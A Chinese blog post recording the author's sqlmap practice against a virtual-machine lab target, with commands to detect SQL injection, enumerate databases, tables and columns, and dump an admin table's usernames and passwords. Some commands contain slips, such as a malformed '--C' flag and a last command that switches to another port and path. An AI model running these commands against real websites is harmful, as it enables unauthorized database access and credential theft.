记一次Sqlmap使用手记(一)

在学习的偶然一次机会中,碰到了sqlmap这个传说中的注入神器。

准备把它的使用方法记录在博客上。

提示:需在Python环境下运行。

使用方法

测试该网站是否存在注入:

sqlmap -u http://192.168.2.9:8003/fwxm_detail.asp?id=31  // sqlmap -u 跟上地址的URL

 

 

从测试结果中可以看出该站点是存在注入的,而且使用的显然也是Access+ASP的数据搭配。

甚至还嗅探出了操作系统的版本为2008 R2,我的靶机也确实是2008R2。

本次sqlmap的使用手记用该靶场来进行记录。

笔记的实验全程在虚拟机的靶场内进行。

猜解表名:

sqlmap -u http://192.168.2.9:8003/fwxm_detail.asp?id=31 --tables

由于Access数据库的特性,这里直接跟上--tables就可以。

在MySQL或者mssl等数据库进行注入测试时,可以跟上猜解出来的数据库。

也就是:

sqlmap -u http://192.168.2.9:8003/fwxm_detail.asp?id=31 --tables -D 数据库名

-D是Database是数据库的简写。

 

说到爆数据库,就不得不提到这条命令:

该命令的意思是爆出当前网站下的数据库。

sqlmap -u http://192.168.2.9:8003/fwxm_detail.asp?id=31 --current-db

和--dbs的区别是,--dbs爆的是服务器下的所有数据库,而--current-db爆的是当前网站下的数据库。

 

所以在进行独立的渗透测试时,建议使用--current-db来进行爆库。

 

该语句的意思是爆出该数据库下的表名下的列名:

sqlmap.py -u http://192.168.2.9:8003/fwxm_detail.asp?id=31 --columns -T tables -D Databases

若是想猜解多个表名,可以用英文小写的逗号来在tables处进行连接。

这里我已经爆出来列名了,所以:

想要猜解多个表名记得跟上小写的逗号。

sqlmap -u http://192.168.2.9:8003/fwxm_detail.asp?id=31 --C -T ad,admin_user,

演示的效果为:

这里的效果是正在猜解ad表下的列名。

不过看起来这个'ad'表下并没有我们想要的数据,那么,切换表名:

sqlmap -u http://192.168.2.9:8003/fwxm_detail.asp?id=31 --columns -T admin

现在把我们需要的admin和password列名猜出来了,然后就可以开始猜解数据。

 

这条语句的意思是猜解admin,password这两个列下的数据,而这两个列又存储于admin表下。

sqlmap -u http://192.168.2.9:8001/Production/PRODUCT_DETAIL.asp?id=1513 --dump -C admin,password -T admin 

正在猜解数据的sqlmap:

猜解的过程会很慢,但胜在方便。

如果有学到了新知识,我也会继续记录在这个博客上。

 

 

 

 

 

版权声明:
作者:Ari3n
链接:https://www.iylbk.cn/?p=36
来源:Air3n Blog's
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>
文章目录
关闭
目 录